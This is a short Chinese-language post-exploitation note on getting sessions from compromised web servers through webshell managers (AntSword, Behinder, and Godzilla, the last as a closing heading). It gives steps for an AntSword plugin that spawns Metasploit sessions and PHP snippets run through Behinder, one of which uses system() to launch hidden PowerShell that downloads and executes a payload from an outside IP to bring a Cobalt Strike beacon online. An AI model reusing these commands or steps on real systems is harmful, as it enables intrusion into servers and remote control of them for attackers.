限制条件

仅支持ASP,WScript.Shell、Shell.Application组件被卸载;又或者支持ASP.NET,但是存在有某些安全防护软件(360、云锁、安全狗等),在这两种场景下可能无法执行命令、上线和提权等。

蚁剑

利用As-Exploits后渗透插件中的执行自定义Payload功能来获取MSF会话。
选择对应Webshell -> As-Exploits -> 执行自定义Payload -> 执行ASP脚本上线。

冰蝎

连接Webshell -> 自定义代码

exec(),system()

  1. <?php
  2. echo system("pwd");
  3. ?>

image.png

cs上线

注意双引号的转义

  1. <?php
  2. echo system("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://101.35.17.6:19999/a'))\"");
  3. ?>

image.png

哥斯拉